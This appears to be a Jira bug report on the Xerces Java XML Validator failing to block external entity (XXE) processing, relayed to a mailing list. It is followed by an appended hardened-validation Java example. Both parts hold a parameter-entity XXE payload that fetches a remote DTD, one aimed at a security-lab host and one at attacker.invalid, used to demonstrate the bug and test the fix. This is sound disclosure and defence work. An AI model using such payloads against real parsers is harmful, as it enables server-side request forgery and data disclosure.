Posted to j-dev@xerces.apache.org by "Samuel Hailemichael (Jira)" <xe...@xml.apache.org> on 2023/07/13 19:06:00 UTC

[jira] [Updated] (XERCESJ-1758) XML validator xxe vulnerability

     [ https://issues.apache.org/jira/browse/XERCESJ-1758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Samuel Hailemichael updated XERCESJ-1758:
-----------------------------------------
    Description: 
While implementing a Validator using Apache Xerces, the features that are supposed to prevent XML External Entity (XXE) processing are not working. When parsing an XML file, I consistently get DNS callbacks when it attempts to load an external DTD from a DOCTYPE declaration. I am using the latest Xerces version (2.12.2).
*Attempt 1*
{code:java}
import java.io.ByteArrayInputStream;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
// Features intended to reject DOCTYPE declarations and block external entity resolution
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));{code}
Sample XML file:
{code:java}
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]> {code}
When using a Validator, it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is parsed. Here's an example of the outbound call that is made when an XML file containing a DOCTYPE declaration is parsed through the Validator:
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
	at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
	at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
	at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
	at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
	at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
	at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
	at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
	at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
	at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
	at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
	at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of making an outbound call, it should throw an exception for the DOCTYPE declaration in the XML file.

*Attempt 2*
{code:java}
import java.io.ByteArrayInputStream;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
// JAXP 1.5 properties that are supposed to restrict access to external DTDs and schemas
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>))); {code}
This implementation is the recommended way to prevent external entity processing for validators (https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator), but it gives this error when used with Xerces:
{code:java}
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
    at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source) {code}
 

 


> XML validator xxe vulnerability
> -------------------------------
>
>                 Key: XERCESJ-1758
>                 URL: https://issues.apache.org/jira/browse/XERCESJ-1758
>             Project: Xerces2-J
>          Issue Type: Bug
>          Components: JAXP (javax.xml.validation)
>            Reporter: Samuel Hailemichael
>            Priority: Major
>

--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: j-dev-unsubscribe@xerces.apache.org
For additional commands, e-mail: j-dev-help@xerces.apache.org
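Added example, not code from the report or from the Xerces project, covering both attempts above: keep the DOCTYPE and entity policy out of the Validator entirely by parsing the untrusted document with a SAX XMLReader whose security features are set and verified, and hand the Validator a SAXSource built on that reader, so the Validator consumes SAX events instead of scanning the raw stream with its own parser (the StreamValidatorHelper path in the reported stack trace). The class name HardenedValidation, the helpers mustSetFeature, mustSetProperty, hardenedReader, validatorFor and validateUntrusted, the inline schema, the two sample documents and the attacker.invalid host are all assumptions made for this example. Every feature and property is set through a helper that rethrows SAXNotRecognizedException and SAXNotSupportedException, so a runtime that lacks a control fails closed rather than continuing unprotected; the JDK's built-in parser accepts all of the settings used here, whereas a runtime that rejects ACCESS_EXTERNAL_DTD or ACCESS_EXTERNAL_SCHEMA on the SchemaFactory (the report shows Xerces's ValidatorImpl rejecting them on the Validator) will throw at validatorFor, which is the signal that this control has to live somewhere the runtime honours it.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXNotRecognizedException;
import org.xml.sax.SAXNotSupportedException;
import org.xml.sax.SAXParseException;
import org.xml.sax.XMLReader;

/** Added example (hypothetical class name): XXE-safe schema validation of untrusted XML. */
public class HardenedValidation {

    // Constructed schema for the example: the root element must be <foo> with string content.
    static final String XSD =
        "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">"
      + "<xs:element name=\"foo\" type=\"xs:string\"/>"
      + "</xs:schema>";

    // Constructed inputs: a benign document, and one carrying the same kind of
    // parameter-entity DOCTYPE as the report. The host uses the reserved .invalid TLD.
    static final String BENIGN = "<?xml version=\"1.0\"?><foo>hello</foo>";
    static final String WITH_DOCTYPE =
        "<?xml version=\"1.0\"?>"
      + "<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"https://attacker.invalid/exploit.dtd\"> %xxe;]>"
      + "<foo>hello</foo>";

    /** Fail closed: a security feature the parser does not accept is an error, not a warning. */
    static void mustSetFeature(XMLReader reader, String feature, boolean value) throws SAXException {
        try {
            reader.setFeature(feature, value);
        } catch (SAXNotRecognizedException | SAXNotSupportedException e) {
            throw new SAXException("parser rejected security feature " + feature, e);
        }
    }

    /** Same rule for the JAXP 1.5 access properties on the SchemaFactory. */
    static void mustSetProperty(SchemaFactory factory, String property, Object value) throws SAXException {
        try {
            factory.setProperty(property, value);
        } catch (SAXNotRecognizedException | SAXNotSupportedException e) {
            throw new SAXException("schema factory rejected security property " + property, e);
        }
    }

    /** An XMLReader that rejects any DOCTYPE and never resolves external entities or DTDs. */
    static XMLReader hardenedReader() throws SAXException, ParserConfigurationException {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true); // needed for XSD validation of namespaced content
        XMLReader reader = spf.newSAXParser().getXMLReader();
        mustSetFeature(reader, XMLConstants.FEATURE_SECURE_PROCESSING, true);
        mustSetFeature(reader, "http://apache.org/xml/features/disallow-doctype-decl", true);
        mustSetFeature(reader, "http://xml.org/sax/features/external-general-entities", false);
        mustSetFeature(reader, "http://xml.org/sax/features/external-parameter-entities", false);
        mustSetFeature(reader, "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return reader;
    }

    /** Compiles a trusted inline schema with external DTD/schema access forbidden during compilation. */
    static Validator validatorFor(String xsd) throws SAXException {
        SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        mustSetProperty(sf, XMLConstants.ACCESS_EXTERNAL_DTD, "");
        mustSetProperty(sf, XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        Schema schema = sf.newSchema(new StreamSource(new StringReader(xsd)));
        return schema.newValidator();
    }

    /** The entity policy lives in the XMLReader producing the SAX events, not in the Validator. */
    static void validateUntrusted(Validator validator, String xml)
            throws SAXException, ParserConfigurationException, IOException {
        SAXSource source = new SAXSource(hardenedReader(), new InputSource(new StringReader(xml)));
        validator.validate(source);
    }

    public static void main(String[] args) throws Exception {
        Validator validator = validatorFor(XSD);
        validateUntrusted(validator, BENIGN);
        System.out.println("benign document: valid");
        try {
            validateUntrusted(validator, WITH_DOCTYPE);
            System.out.println("UNEXPECTED: document with DOCTYPE was accepted");
        } catch (SAXParseException e) {
            // A DOCTYPE is a fatal parse error here, raised before any entity is resolved.
            System.out.println("document with DOCTYPE rejected: " + e.getMessage());
        }
    }
}
```

A Validator is not thread-safe, so create one per thread (or per call) from the shared Schema; hardenedReader() is likewise called per validation because an XMLReader holds parse state. If the runtime ever rejects one of the features in hardenedReader, the exception message names the missing control, which is the behaviour the report asks for in place of a silent outbound request.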